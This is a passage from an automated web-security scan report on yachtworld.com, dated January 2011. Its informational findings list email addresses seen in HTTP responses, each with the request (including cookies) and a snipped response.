or-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:36:23 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Length: 102107
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en">
<head>
<title>Boat and Yacht Sales, Buy Boats and Yachts - YachtWorld.com
...[SNIP]...
<dd class="byp_desc"> roxane@navypointmarine.com </dd>
...[SNIP]...

15.40. http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_TX.html.en previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/byp/categories/BrokerageSales/YachtBrokerageFirms_TX.html.en

Issue detail

The following email address was disclosed in the response:

Info@LittleYachtSales.com

Request

GET /byp/categories/BrokerageSales/YachtBrokerageFirms_TX.html.en HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:36:50 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Length: 65355
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en">
<head>
<title>Boat and Yacht Sales, Buy Boats and Yachts - YachtWorld.com
...[SNIP]...
<dd class="byp_desc"> Little Yacht Sales-The Gulf Coast's place for Premier Brokerage Yachts. Over 27 years experience exclusively in yacht sales. 713-817-7216 Info@LittleYachtSales.com </dd>
...[SNIP]...

15.41. http://www.yachtworld.com/core/globalnav/privacy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/globalnav/privacy.jsp

Issue detail

The following email addresses were disclosed in the response:

cs@yachtworld.com
policies@yachtworld.com

Request

GET /core/globalnav/privacy.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:34:39 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="mailto:policies@yachtworld.com">policies@yachtworld.com</a>
...[SNIP]...
<a href="mailto:cs@yachtworld.com">cs@yachtworld.com</a>
...[SNIP]...
<a href="mailto:policies@yachtworld.com">policies@yachtworld.com</a>
...[SNIP]...

15.42. http://www.yachtworld.com/core/globalnav/termOfUse.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/globalnav/termOfUse.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /core/globalnav/termOfUse.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:34:39 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="mailto:copyright@yachtworld.com">copyright@yachtworld.com</a>
...[SNIP]...

15.43. http://www.yachtworld.com/core/gzip_1874314158/bundles/ywTemplate1Bundle.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/gzip_1874314158/bundles/ywTemplate1Bundle.js

Issue detail

The following email address was disclosed in the response:

id@Ls.tc

Request

GET /core/gzip_1874314158/bundles/ywTemplate1Bundle.js HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_pers=%20s_nr%3D1296155886782%7C1298747886782%3B%20s_lv%3D1296155886784%7C1390763886784%3B%20s_lv_s%3DFirst%2520Visit%7C1296157686784%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; yw_locale2=en_US

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:18:48 GMT
Server: Apache
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
ETag: 2740050219
Expires: Wed, 27 Jan 2021 19:18:48 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Vary: User-Agent
Content-Type: text/javascript; charset=UTF-8
Content-Length: 160642

function setReferrerCookie(referrerUrl){var expires=365*1000*60*60*24;var today=new Date();today.setTime(today.getTime());var expiresDate=new Date(today.getTime()+expires);document.cookie="DUMMY_REFE
...[SNIP]...
.hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;
...[SNIP]...

15.44. http://www.yachtworld.com/core/listing/cache/searchResults.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

POST /core/listing/cache/searchResults.jsp HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_
Content-Length: 219

man=regulator&is=false&type=&luom=126&fromLength=24&toLength=32&fromYear=2004&toYear=&pricderange=Select+Price+Range&Ntt=&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boa
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:19:07 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 91420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

               <titl
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.45. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The following email address was disclosed in the response:

klack@galatiyachts.com

Request

Response

15.46. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The following email address was disclosed in the response:

DFrazer@BluewaterYachtSales.com

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet&id=2061801&lang=en&slim=broker&&hosturl=bluewater&&ywo=bluewater& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; 